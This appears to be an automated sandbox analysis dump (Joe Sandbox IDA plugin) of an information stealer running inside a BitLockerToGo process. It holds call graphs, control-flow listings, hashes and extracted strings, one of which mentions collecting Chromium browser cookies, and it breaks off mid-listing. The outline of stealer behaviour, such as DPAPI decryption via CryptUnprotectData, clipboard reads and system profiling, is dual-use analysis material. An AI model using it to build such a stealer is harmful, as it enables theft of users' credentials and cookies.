12794->12793 12795 2a28c20 GetComputerNameExA 12794->12795 12796 2a28d30 GetComputerNameExA 12794->12796 12797 2a2899f 12794->12797 12799 2a289a4 12794->12799 12795->12797 12801 2a28da3 12796->12801 12797->12795 12798 2a28acb FreeLibrary 12798->12797 12799->12798 12799->12799 12800 2a2955f 12800->12762 12801->12800 12801->12801 12802 2a34340 3 API calls 12801->12802 12805 2a2965a 12802->12805 12803 2a34340 3 API calls 12803->12805 12804 2a29bd5 GetPhysicallyInstalledSystemMemory 12804->12805 12805->12803 12805->12804 12805->12805 12806 2a2f570 12807 2a2f5a6 KiUserCallbackDispatcher GetSystemMetrics 12806->12807 12808 2a2f5ef DeleteObject 12807->12808 12810 2a2f64e SelectObject 12808->12810 12812 2a2f6ea SelectObject 12810->12812 12813 2a2f713 DeleteObject 12812->12813 12816 2a343a9 12815->12816 12817 2a34808 12816->12817 12819 2a10780 12816->12819 12822 2a34732 12816->12822 12824 2a34458 GetVolumeInformationW 12816->12824 12827 2a3447d 12816->12827 12829 2a34658 12816->12829 12821 2a37eb0 RtlFreeHeap 12817->12821 12818 2a3be40 LdrInitializeThunk 12823 2a34642 12818->12823 12820 2a383f0 LdrInitializeThunk 12820->12822 12828 2a34812 12821->12828 12822->12817 12822->12820 12825 2a381d0 LdrInitializeThunk 12822->12825 12826 2a38310 LdrInitializeThunk 12822->12826 12823->12817 12823->12819 12823->12822 12823->12829 12824->12817 12824->12819 12824->12822 12824->12827 12824->12829 12825->12822 12826->12822 12827->12817 12827->12818 12827->12819 12827->12822 12827->12827 12827->12829 12828->12819 12870 2a39870 LdrInitializeThunk 12828->12870 12829->12819 12869 2a39870 LdrInitializeThunk 12829->12869 12833 2a2f383 12832->12833 12834 2a2f3a6 OpenClipboard 12833->12834 12835 2a2f3d2 12834->12835 12836 2a10754 12835->12836 12837 2a2f3db GetWindowLongW GetClipboardData 12835->12837 12836->12765 12836->12806 12838 2a2f416 CloseClipboard 12837->12838 12839 2a2f41b GlobalLock 12837->12839 12838->12836 12841 2a2f43d 12839->12841 12842 2a2f539 GlobalUnlock 12841->12842 12842->12838 12845 2a3caed 12843->12845 12844 2a3cdbd 12844->12774 12847 2a3cb5e 12845->12847 12851 2a39870 LdrInitializeThunk 12845->12851 12847->12844 12850 2a3cc4e 12847->12850 12852 2a39870 LdrInitializeThunk 12847->12852 12848 2a37eb0 RtlFreeHeap 12848->12844 12850->12848 12851->12847 12852->12850 12853->12781 12854->12784 12856 2a23138 12855->12856 12856->12856 12859 2a37f70 12856->12859 12861 2a37fac 12859->12861 12860 2a2318e 12863 2a3801e 12861->12863 12867 2a39870 LdrInitializeThunk 12861->12867 12863->12860 12865 2a380fe 12863->12865 12868 2a39870 LdrInitializeThunk 12863->12868 12864 2a37eb0 RtlFreeHeap 12864->12860 12865->12864 12867->12863 12868->12865 12869->12819 12870->12819 12871 2a3a3f6 12872 2a3a3fc 12871->12872 12874 2a3a47e 12872->12874 12878 2a39870 LdrInitializeThunk 12872->12878 12877 2a39870 LdrInitializeThunk 12874->12877 12876 2a3a554 12877->12876 12878->12874 12485 2a31fba 12486 2a31fbf 12485->12486 12487 2a31fd7 GetUserDefaultUILanguage 12486->12487 12488 2a17cbb 12489 2a17cfa 12488->12489 12501 2a166c0 12489->12501 12491 2a17d55 12492 2a166c0 LdrInitializeThunk 12491->12492 12493 2a17e2a 12492->12493 12494 2a166c0 LdrInitializeThunk 12493->12494 12495 2a17f33 12494->12495 12496 2a166c0 LdrInitializeThunk 12495->12496 12497 2a1800f 12496->12497 12499 2a166c0 LdrInitializeThunk 12497->12499 12500 2a18a88 12497->12500 12512 2a34600 12497->12512 12499->12497 12502 2a166e0 12501->12502 12502->12502 12503 2a3be40 LdrInitializeThunk 12502->12503 12504 2a1679a 12503->12504 12505 2a167c1 12504->12505 12508 2a167f5 12504->12508 12511 2a1680b 12504->12511 12534 2a3c1d0 12504->12534 12505->12508 12505->12511 12527 2a3c2d0 12505->12527 12508->12511 12533 2a39870 LdrInitializeThunk 12508->12533 12510 2a16a48 12511->12491 12513 2a34630 12512->12513 12514 2a3be40 LdrInitializeThunk 12513->12514 12515 2a34642 12514->12515 12516 2a34808 12515->12516 12518 2a34651 12515->12518 12520 2a34732 12515->12520 12524 2a34658 12515->12524 12541 2a37eb0 12516->12541 12518->12497 12520->12516 12546 2a381d0 12520->12546 12550 2a383f0 12520->12550 12558 2a38310 12520->12558 12524->12518 12545 2a39870 LdrInitializeThunk 12524->12545 12529 2a3c30b 12527->12529 12528 2a3c45e 12528->12508 12531 2a3c37e 12529->12531 12538 2a39870 LdrInitializeThunk 12529->12538 12531->12528 12539 2a39870 LdrInitializeThunk 12531->12539 12533->12510 12536 2a3c20d 12534->12536 12535 2a3c27e 12535->12505 12536->12535 12540 2a39870 LdrInitializeThunk 12536->12540 12538->12531 12539->12528 12540->12535 12542 2a34812 12541->12542 12544 2a37eda 12541->12544 12542->12518 12562 2a39870 LdrInitializeThunk 12542->12562 12543 2a37f40 RtlFreeHeap 12543->12542 12544->12543 12544->12544 12545->12518 12547 2a382ce 12546->12547 12548 2a381e7 12546->12548 12547->12520 12548->12547 12548->12548 12563 2a39870 LdrInitializeThunk 12548->12563 12551 2a385de 12550->12551 12552 2a3840b 12550->12552 12551->12520 12552->12551 12552->12552 12556 2a384ae 12552->12556 12564 2a39870 LdrInitializeThunk 12552->12564 12553 2a385ae 12553->12551 12554 2a38310 LdrInitializeThunk 12553->12554 12554->12551 12556->12553 12565 2a39870 LdrInitializeThunk 12556->12565 12559 2a383be 12558->12559 12560 2a38326 12558->12560 12559->12520 12560->12559 12566 2a39870 LdrInitializeThunk 12560->12566 12562->12518 12563->12547 12564->12556 12565->12553 12566->12559 12879 2a23840 12880 2a238e6 12879->12880 12881 2a3cab0 2 API calls 12880->12881 12882 2a3c680 LdrInitializeThunk 12880->12882 12883 2a23d5b 12880->12883 12886 2a3d120 12880->12886 12894 2a39870 LdrInitializeThunk 12880->12894 12881->12880 12882->12880 12887 2a3d140 12886->12887 12888 2a3d1fe 12887->12888 12895 2a39870 LdrInitializeThunk 12887->12895 12891 2a3d37c 12888->12891 12893 2a3d2f2 12888->12893 12896 2a39870 LdrInitializeThunk 12888->12896 12890 2a37eb0 RtlFreeHeap 12890->12891 12891->12880 12893->12890 12894->12880 12895->12888 12896->12893 12570 2a1f484 12571 2a1f503 12570->12571 12571->12571 12575 2a3c020 12571->12575 12573 2a3c020 LdrInitializeThunk 12574 2a1f6e2 12573->12574 12574->12573 12576 2a3c040 12575->12576 12577 2a3c188 12576->12577 12579 2a39870 LdrInitializeThunk 12576->12579 12577->12574 12579->12577 12897 2a12846 12900 2a12850 12897->12900 12898 2a12c36 12899 2a09fa0 3 API calls 12899->12900 12900->12898 12900->12899 12901 2a22345 12902 2a224c2 12901->12902 12904 2a22320 12901->12904 12903 2a3c680 LdrInitializeThunk 12903->12904 12904->12901 12904->12903 12580 2a3a088 12581 2a3a0b2 12580->12581 12583 2a3a15e 12580->12583 12584 2a39fa2 12580->12584 12581->12583 12589 2a39870 LdrInitializeThunk 12581->12589 12582 2a39e1a 12583->12583 12584->12581 12584->12582 12585 2a39fc7 12584->12585 12585->12582 12588 2a39870 LdrInitializeThunk 12585->12588 12588->12582 12589->12583 12590 2a1798c 12591 2a17996 12590->12591 12592 2a3c2d0 LdrInitializeThunk 12591->12592 12593 2a179a6 12592->12593 12594 2a3c2d0 LdrInitializeThunk 12593->12594 12595 2a179c5 12594->12595 12909 2a1154c 12910 2a11574 12909->12910 12911 2a09fa0 3 API calls 12910->12911 12912 2a11d8e 12911->12912 12596 2a16c8e 12597 2a16c94 12596->12597 12597->12597 12598 2a3be40 LdrInitializeThunk 12597->12598 12599 2a16e0d 12598->12599 12913 2a094d0 12915 2a094d9 12913->12915 12916 2a094fd CoInitializeEx 12915->12916 12917 2a094f8 12915->12917 12921 2a094ea ExitProcess 12915->12921 12916->12917 12918 2a09526 CoInitializeSecurity 12916->12918 12940 2a39700 12917->12940 12920 2a09584 12918->12920 12924 2a09582 CoUninitialize 12918->12924 12927 2a0a640 12920->12927 12924->12917 12925 2a09589 12925->12924 12939 2a0c4e0 FreeLibrary 12925->12939 12928 2a0a656 12927->12928 12929 2a0a7d7 LoadLibraryExW 12928->12929 12930 2a0a811 12929->12930 12931 2a0a9e1 12930->12931 12935 2a0a817 12930->12935 12943 2a0b260 12930->12943 12932 2a0ab6c GetProcessVersion 12931->12932 12931->12935 12937 2a0ad70 12932->12937 12934 2a37eb0 RtlFreeHeap 12934->12935 12935->12925 12936 2a0b260 RtlFreeHeap 12938 2a0af4b 12936->12938 12937->12935 12937->12936 12937->12938 12938->12934 12939->12924 12947 2a3ace0 12940->12947 12942 2a39705 FreeLibrary 12942->12921 12946 2a0b2cd 12943->12946 12944 2a37eb0 RtlFreeHeap 12945 2a0b829 12944->12945 12945->12930 12946->12944 12946->12945 12948 2a3ace9 12947->12948 12948->12942 12949 2a179d0 12950 2a179da 12949->12950 12953 2a39870 LdrInitializeThunk 12950->12953 12952 2a17c80 12953->12952 12954 2a16e50 12955 2a16e55 12954->12955 12956 2a3c1d0 LdrInitializeThunk 12955->12956 12957 2a16e6e 12956->12957 12958 2a16e81 12957->12958 12959 2a16fb4 12957->12959 12960 2a16ea6 12957->12960 12962 2a16fba 12957->12962 12965 2a16eca 12957->12965 12963 2a3c2d0 LdrInitializeThunk 12958->12963 12960->12959 12961 2a01e80 2 API calls 12960->12961 12960->12965 12961->12965 12962->12965 12968 2a39870 LdrInitializeThunk 12962->12968 12963->12960 12965->12959 12966 2a17477 CryptUnprotectData 12965->12966 12967 2a174ad 12966->12967 12968->12962 12969 2a25353 12970 2a25350 12969->12970 12970->12969 12970->12970 12971 2a3be40 LdrInitializeThunk 12970->12971 12972 2a250fd 12970->12972 12971->12970 12604 2a39617 12605 2a39298 12604->12605 12606 2a392b8 GetLogicalDrives 12604->12606 12607 2a39625 12604->12607 12605->12606 12606->12604 12973 2a1d7d5 12974 2a37eb0 RtlFreeHeap 12973->12974 12975 2a1d7e0 12974->12975 12976 2a1d257 12977 2a3be40 LdrInitializeThunk 12976->12977 12978 2a1d28a 12977->12978 12608 2a0f799 12611 2a0f7b0 12608->12611 12612 2a37eb0 RtlFreeHeap 12611->12612 12613 2a01e80 12611->12613 12618 2a02a00 12611->12618 12612->12611 12614 2a01e88 12613->12614 12615 2a01eac 12613->12615 12629 2a01eb0 12614->12629 12615->12611 12617 2a01eab 12617->12611 12619 2a02b17 12618->12619 12620 2a02a0e 12618->12620 12621 2a02ade 12620->12621 12622 2a02a23 12620->12622 12626 2a02ab1 12620->12626 12623 2a02a00 RtlFreeHeap 12621->12623 12621->12626 12622->12619 12624 2a02a00 RtlFreeHeap 12622->12624 12625 2a02a63 12622->12625 12623->12621 12624->12622 12627 2a37eb0 RtlFreeHeap 12625->12627 12628 2a37eb0 RtlFreeHeap 12626->12628 12627->12626 12628->12619 12630 2a01ec5 12629->12630 12636 2a01f0d 12629->12636 12631 2a02077 12630->12631 12633 2a020c5 12630->12633 12634 2a0219f 12630->12634 12630->12636 12649 2a02fe0 12631->12649 12635 2a022d9 12633->12635 12633->12636 12643 2a02122 12633->12643 12634->12635 12634->12636 12647 2a0221f 12634->12647 12637 2a02a00 RtlFreeHeap 12635->12637 12636->12617 12637->12636 12638 2a02fe0 2 API calls 12638->12647 12639 2a01eb0 2 API calls 12639->12643 12640 2a02a00 RtlFreeHeap 12640->12636 12641 2a0225c 12641->12636 12641->12640 12642 2a02a00 RtlFreeHeap 12642->12641 12643->12636 12643->12639 12643->12641 12648 2a02589 12643->12648 12644 2a01eb0 2 API calls 12644->12647 12645 2a02563 12646 2a02a00 RtlFreeHeap 12645->12646 12646->12641 12647->12636 12647->12638 12647->12641 12647->12644 12647->12645 12647->12648 12648->12642 12650 2a02ff4 12649->12650 12651 2a0327b 12649->12651 12650->12651 12655 2a37e92 RtlAllocateHeap 12650->12655 12651->12636 12652 2a03256 12652->12651 12653 2a37eb0 RtlFreeHeap 12652->12653 12653->12651 12979 2a392d8 12985 2a33a70 12979->12985 12981 2a392dd 12982 2a33a70 LdrInitializeThunk 12981->12982 12983 2a392e5 12982->12983 12984 2a33a70 LdrInitializeThunk 12983->12984 12984->12983 12986 2a33a9f 12985->12986 12987 2a3c020 LdrInitializeThunk 12986->12987 12988 2a341d7 12986->12988 12987->12988 12988->12981 12989 2a2b85e 12990 2a2b922 SysAllocString 12989->12990 12991 2a2b8df 12989->12991 12992 2a2b980 12990->12992 12991->12990

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 2a0b260-2a0b2cb 1 2a0b2cd 0->1 2 2a0b30f-2a0b693 0->2 5 2a0b2cf-2a0b30b 1->5 3 2a0b6f0-2a0b778 2->3 4 2a0b695 2->4 7 2a0b7e6-2a0b820 call 2a0c4f0 3->7 8 2a0b77a 3->8 6 2a0b697-2a0b6ec 4->6 5->5 9 2a0b30d 5->9 6->6 10 2a0b6ee 6->10 14 2a0b825-2a0b827 7->14 11 2a0b77c-2a0b7e2 8->11 9->2 10->3 11->11 13 2a0b7e4 11->13 13->7 15 2a0b829 14->15 16 2a0b82e-2a0b889 call 2a08ef0 call 2a09600 14->16 17 2a0bd2d-2a0bd3d 15->17 22 2a0b8e7-2a0b90a call 2a0e0e0 16->22 23 2a0b88b 16->23 30 2a0b90c-2a0b97c 22->30 31 2a0b90e-2a0b913 22->31 24 2a0b88d-2a0b8e3 23->24 24->24 26 2a0b8e5 24->26 26->22 34 2a0b9da-2a0b9f4 call 2a0c460 30->34 35 2a0b97e 30->35 33 2a0bd1d-2a0bd2b call 2a37eb0 31->33 33->17 43 2a0b9fa-2a0baca 34->43 44 2a0bd1b 34->44 37 2a0b980-2a0b9d6 35->37 37->37 42 2a0b9d8 37->42 42->34 45 2a0bb20-2a0bb73 call 2a0c460 43->45 46 2a0bacc 43->46 44->33 45->44 51 2a0bb79-2a0bbd7 45->51 47 2a0bace-2a0bb1c 46->47 47->47 49 2a0bb1e 47->49 49->45 52 2a0bbd9 51->52 53 2a0bc3e-2a0bc64 call 2a0c460 51->53 54 2a0bbdb-2a0bc3a 52->54 58 2a0bd19 53->58 59 2a0bc6a-2a0bc7f 53->59 54->54 56 2a0bc3c 54->56 56->53 58->44 60 2a0bc81-2a0bc83 59->60 61 2a0bca5-2a0bcb8 59->61 62 2a0bc85-2a0bc8f 60->62 63 2a0bcba-2a0bcc0 61->63 64 2a0bd0f-2a0bd14 61->64 62->62 65 2a0bc91-2a0bca3 62->65 66 2a0bcc2-2a0bcc5 63->66 64->58 65->61 67 2a0bcc7-2a0bcc9 66->67 68 2a0bccb-2a0bd0d call 2a0f110 66->68 67->64 68->64 68->66
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$'$9$9$;$=$?$G$H$H$H$I$I$I$K$K$N$P$Q$R$S$S$T$U$W$Y$]$^$_$a$f$h$i$j$n$o$o$p$p$r$u$v$w$w${$}
                      • API String ID: 0-3428971038
                      • Opcode ID: 054139abad4c57735c6b855d2ee21928d5630900420f1badff68bbbf87f3be7f
                      • Instruction ID: cc332c65a9f676419c3eed08f20c2f2f846c8cea91b0c4525ceb0d091d5f4c3f
                      • Opcode Fuzzy Hash: 054139abad4c57735c6b855d2ee21928d5630900420f1badff68bbbf87f3be7f
                      • Instruction Fuzzy Hash: BE52023010C7C18AD336CB28959879FBFE16BA6328F084E5DE0E95B2D2C7B58545CB67
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: #/33$$-xS$/}2 $3: $E\_j$RRIP$Tw;.$\3*$twj]$zeJy
                      • API String ID: 0-232789478
                      • Opcode ID: a43efb9b239e53e2a796d3572fc3df23fce679b748382c2d1ba3b7a611c09a3b
                      • Instruction ID: 5ebdfa84a7ffbea4b9402d2201c5efc283c0f9a2f541e796c73d0ef9bd070091
                      • Opcode Fuzzy Hash: a43efb9b239e53e2a796d3572fc3df23fce679b748382c2d1ba3b7a611c09a3b
                      • Instruction Fuzzy Hash: B3238B70104B918EE329CF39C5947A3FBE2BF56304F58895DD4EB8B682CB79A409CB54

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 589 2a16e50-2a16e7a call 2a08d40 call 2a3c1d0 594 2a16e81-2a16ea1 call 2a08d30 call 2a3c2d0 589->594 595 2a16fa0 589->595 596 2a16fc3-2a17003 589->596 597 2a16fa2-2a16fad 589->597 598 2a16fb4 589->598 599 2a16eb9-2a16ed6 call 2a01e80 589->599 600 2a16edd-2a16f3b call 2a02760 589->600 626 2a16ea6-2a16eb2 594->626 595->597 602 2a17063-2a1706e 596->602 603 2a17005 596->603 597->598 606 2a1728e-2a17294 597->606 599->595 599->597 599->598 599->600 599->606 615 2a16f7d-2a16f94 call 2a028c0 600->615 616 2a16f3d-2a16f3f 600->616 610 2a17070-2a1707f 602->610 611 2a170c2-2a170cf 602->611 608 2a17010-2a17061 603->608 613 2a172a0-2a172a6 606->613 608->602 608->608 617 2a17080-2a17087 610->617 611->596 611->606 619 2a16fba-2a16fc0 call 2a08d40 611->619 613->613 614 2a172a8-2a172f1 613->614 620 2a172f3-2a172f6 614->620 621 2a172f8 614->621 615->595 622 2a16f40-2a16f7b 616->622 623 2a17089-2a1708c 617->623 624 2a170a8-2a170ae 617->624 619->596 620->621 629 2a172fc-2a17314 620->629 621->629 622->615 622->622 623->617 630 2a1708e 623->630 624->611 632 2a170b0-2a170bf call 2a39870 624->632 626->595 626->597 626->598 626->599 626->600 626->606 633 2a17316-2a17326 629->633 634 2a17328-2a1732f 629->634 630->611 632->611 633->634 636 2a17331-2a17333 633->636 637 2a17337-2a1734b call 2a08d30 634->637 636->637 641 2a17441-2a174a6 call 2a3b300 CryptUnprotectData 637->641 642 2a17351-2a17358 637->642 647 2a17633 641->647 648 2a17626-2a1762c call 2a08d40 641->648 649 2a17639-2a17642 call 2a08d40 641->649 650 2a1764b 641->650 651 2a174ad-2a174de 641->651 652 2a1762f 641->652 644 2a17372-2a173b7 call 2a197e0 * 2 642->644 664 2a17360-2a1736c 644->664 665 2a173b9-2a173d8 call 2a197e0 644->665 647->649 648->652 649->650 650->650 657 2a174e0-2a1751d 651->657 658 2a1751f-2a17546 651->658 652->647 657->657 657->658 659 2a17550-2a17558 658->659 659->659 663 2a1755a-2a17576 659->663 666 2a17578-2a1757d 663->666 667 2a1757f 663->667 664->641 664->644 665->664 672 2a173da-2a173fe 665->672 669 2a17582-2a1759e call 2a08d30 666->669 667->669 676 2a175c1-2a175ce 669->676 677 2a175a0-2a175a8 669->677 674 2a17404-2a17420 call 2a197e0 672->674 675 2a1735a-2a1735f 672->675 674->664 683 2a17426-2a1743c 674->683 675->664 681 2a175f1-2a17620 call 2a09660 call 2a3b300 676->681 682 2a175d0-2a175d4 676->682 679 2a175b0-2a175bf 677->679 679->676 679->679 681->648 684 2a175e0-2a175ef 682->684 683->664 684->681 684->684
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: .(.#$119,$5 $60&+$?2)$$f$f8 <
                      • API String ID: 0-168083567
                      • Opcode ID: af70753b3ace7f26e12e80ecdb0b5fdd2fce84a2ec6df7ee3777ae2d2461d0b5
                      • Instruction ID: 9964c4bce14a91d67c79f8974d054ed62920ffc6ea621f0cc5e1459eaa985d55
                      • Opcode Fuzzy Hash: af70753b3ace7f26e12e80ecdb0b5fdd2fce84a2ec6df7ee3777ae2d2461d0b5
                      • Instruction Fuzzy Hash: 3F029BB19083418FD714CF28D891A2BF7E2FFC5314F145A6CE9998B291DB35D906CB92

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                      • String ID:
                      • API String ID: 1449868515-3916222277
                      • Opcode ID: e5d72e12cd8427a714d714eee74b35c89a625c24eddeb17c7fa3d16212164508
                      • Instruction ID: 6916f10bfe1bcdb66925afa89fb78502e4f1d913a67443a2b1cc63fb88cc0a8b
                      • Opcode Fuzzy Hash: e5d72e12cd8427a714d714eee74b35c89a625c24eddeb17c7fa3d16212164508
                      • Instruction Fuzzy Hash: 5AA16DB4A097849FD360DF24D68878BBBF0BBD9308F90895DE5889B340DB749559CF82

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 699 2a09fa0-2a09fb3 700 2a09fb5-2a09fc1 699->700 701 2a0a007-2a0a009 699->701 703 2a09fc3-2a09fc5 700->703 704 2a0a00e-2a0a01b 700->704 702 2a0a636-2a0a63f 701->702 706 2a09fc7-2a0a005 703->706 707 2a0a01d-2a0a024 703->707 705 2a0a068-2a0a0d4 call 2a06ca0 call 2a34340 call 2a08d30 704->705 716 2a0a0d6 705->716 717 2a0a11b-2a0a14f call 2a09890 705->717 708 2a0a026-2a0a03b 706->708 707->708 709 2a0a03d-2a0a063 707->709 708->705 709->705 718 2a0a0e0-2a0a119 716->718 721 2a0a1a0-2a0a1dd call 2a09890 717->721 722 2a0a151 717->722 718->717 718->718 726 2a0a22e-2a0a275 call 2a09890 721->726 727 2a0a1df 721->727 723 2a0a160-2a0a19e 722->723 723->721 723->723 731 2a0a2b3-2a0a2e1 726->731 732 2a0a277 726->732 728 2a0a1e0-2a0a22c 727->728 728->726 728->728 734 2a0a2e3 731->734 735 2a0a32c-2a0a36a call 2a09890 731->735 733 2a0a280-2a0a2b1 732->733 733->731 733->733 737 2a0a2f0-2a0a32a 734->737 739 2a0a3b0-2a0a52f call 2a09b60 735->739 740 2a0a36c-2a0a36f 735->740 737->735 737->737 744 2a0a531 739->744 745 2a0a583-2a0a5b9 739->745 741 2a0a370-2a0a3ae 740->741 741->739 741->741 746 2a0a540-2a0a581 744->746 747 2a0a601-2a0a621 call 2a0e120 call 2a08d40 745->747 748 2a0a5bb 745->748 746->745 746->746 753 2a0a626-2a0a62f 747->753 749 2a0a5c0-2a0a5ff 748->749 749->747 749->749 753->702
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: +49>$+<;($0$3 8'$J$MJV#$NM$P$%'
                      • API String ID: 0-3871528633
                      • Opcode ID: d29b6e51af1a5817a252c115fa0e131e3419c4b6a233ccc19f336a55248392ac
                      • Instruction ID: 54afacfa993055390d6ad051058232c55d23f48c58b050fc8b98c093df4d3c64
                      • Opcode Fuzzy Hash: d29b6e51af1a5817a252c115fa0e131e3419c4b6a233ccc19f336a55248392ac
                      • Instruction Fuzzy Hash: BE0223B0208381ABD318CF14D590B6BBBE2FBC5744F54992DE5C98B392DB34D909CB56
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: "L:d$)"b#$gxyz$|FX?
                      • API String ID: 0-3601850346
                      • Opcode ID: 522a6f6048afc58874fa40387825a9eba86880364ccae302731b70ebb6c5e567
                      • Instruction ID: 5322614d09a735a1e590b369565c980e0cf621518c1c2feb946c315d10043e5b
                      • Opcode Fuzzy Hash: 522a6f6048afc58874fa40387825a9eba86880364ccae302731b70ebb6c5e567
                      • Instruction Fuzzy Hash: 9C72BE70504B518BE339CF29C5947A3BBE2AF55308F148A6DC4E78BA97CB39E449CB50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 935 2a18a72-2a18a75 936 2a18a30-2a18a3b 935->936 937 2a18a42-2a18a59 call 2a34600 call 2a166c0 935->937 938 2a18ab5-2a18b3d 935->938 939 2a18c06-2a18cb2 935->939 940 2a18a88 935->940 941 2a18a7c-2a18a81 935->941 942 2a18a9c-2a18aae call 2a08d40 935->942 943 2a18d5c-2a18d65 935->943 944 2a18d6c 935->944 945 2a18a8f-2a18a94 935->945 936->937 936->938 936->939 936->940 936->942 936->943 936->944 936->945 967 2a18a5e-2a18a67 937->967 947 2a18b3f 938->947 948 2a18b9e-2a18bcf 938->948 951 2a18cb4 939->951 952 2a18d16-2a18d1b 939->952 940->945 941->937 941->938 941->939 941->940 941->942 941->943 941->944 941->945 942->938 942->944 943->938 943->944 950 2a18d74-2a18d86 call 2a08d30 944->950 945->942 954 2a18b40-2a18b9c 947->954 955 2a18bd0-2a18bd8 948->955 968 2a18da1-2a18db5 950->968 969 2a18d88-2a18d8f 950->969 958 2a18cc0-2a18d14 951->958 959 2a18d20-2a18d26 952->959 954->948 954->954 955->955 960 2a18bda-2a18c01 955->960 958->952 958->958 959->959 963 2a18d28-2a18d2f 959->963 960->950 964 2a18d51-2a18d54 963->964 965 2a18d31-2a18d36 963->965 964->943 970 2a18d40-2a18d4b 965->970 967->935 972 2a18dd1-2a18e2f 968->972 973 2a18db7-2a18dbf 968->973 971 2a18d90-2a18d9f 969->971 970->970 976 2a18d4d-2a18d4f 970->976 971->968 971->971 974 2a18e31 972->974 975 2a18e93-2a18ec1 972->975 977 2a18dc0-2a18dcf 973->977 978 2a18e40-2a18e91 974->978 979 2a18ed0-2a18ed8 975->979 976->964 977->972 977->977 978->975 978->978 979->979 980 2a18eda-2a18efb 979->980 981 2a18f00-2a18f08 980->981 981->981 982 2a18f0a-2a18f50 call 2a08d30 981->982 987 2a18f71-2a18f87 982->987 988 2a18f52-2a18f57 982->988 991 2a18f90-2a18f9f 987->991 989 2a18f60-2a18f6f 988->989 989->987 989->989 991->991 992 2a18fa1-2a18fb6 991->992 994 2a18fd1-2a1900a 992->994 995 2a18fb8-2a18fbf 992->995 997 2a19067-2a190bc call 2a1c1a0 994->997 998 2a1900c-2a1900f 994->998 996 2a18fc0-2a18fcf 995->996 996->994 996->996 999 2a19010-2a19065 998->999 999->997 999->999
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0m>s$0m>s$RQ$XY$[info] collected cookies file of the chromium-based browser$EK$MS
                      • API String ID: 0-1744010354
                      • Opcode ID: b39541fd6e38ff45d6ab9a110b0b968baaad30d66630d193aacf0456e362c43c
                      • Instruction ID: b255cc9a8f6683dd178fd9829d330e609c34690e7a826a80a6009788d4bb53ab
                      • Opcode Fuzzy Hash: b39541fd6e38ff45d6ab9a110b0b968baaad30d66630d193aacf0456e362c43c
                      • Instruction Fuzzy Hash: 3BF1BE715083418FD728CF14C89076BB7E2FFC6324F148A5DE8DA9B281EB799505CB96

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1102 2a18184-2a1819b call 2a190c0 1104 2a181a0-2a181ad 1102->1104 1105 2a18160-2a1817a 1104->1105 1106 2a181b4-2a181c2 1104->1106 1107 2a181cc-2a181f6 1104->1107 1105->1102 1106->1107 1108 2a18200-2a18208 1107->1108 1108->1108 1109 2a1820a-2a18233 1108->1109 1110 2a18290-2a182b0 call 2a08d30 1109->1110 1111 2a18235-2a18239 1109->1111 1118 2a18380-2a183fe 1110->1118 1119 2a182b6-2a182c9 1110->1119 1113 2a18257-2a18259 1111->1113 1113->1110 1114 2a1825b-2a1825f 1113->1114 1116 2a18261-2a1826a 1114->1116 1117 2a18240-2a18248 1114->1117 1120 2a18280-2a18283 1116->1120 1121 2a1826c-2a1826f 1116->1121 1125 2a1824b-2a18255 1117->1125 1122 2a18450-2a184bd 1118->1122 1123 2a18400-2a1844e 1118->1123 1124 2a182e5-2a182e9 1119->1124 1120->1125 1121->1125 1126 2a18515-2a1851b 1122->1126 1127 2a184bf 1122->1127 1123->1122 1123->1123 1124->1118 1128 2a182ef-2a182f5 1124->1128 1125->1110 1125->1113 1130 2a18520-2a18527 1126->1130 1129 2a184c0-2a18513 1127->1129 1128->1118 1131 2a182fb-2a182ff 1128->1131 1129->1126 1129->1129 1130->1130 1132 2a18529-2a18533 1130->1132 1133 2a18301-2a18319 1131->1133 1134 2a182d0-2a182d2 1131->1134 1136 2a18552-2a1855a 1132->1136 1137 2a18535-2a18537 1132->1137 1138 2a18340-2a18345 1133->1138 1139 2a1831b-2a18324 1133->1139 1135 2a182d7-2a182df 1134->1135 1135->1118 1135->1124 1143 2a1856b-2a18575 1136->1143 1144 2a1855c-2a1855f 1136->1144 1142 2a18540-2a1854e 1137->1142 1138->1135 1141 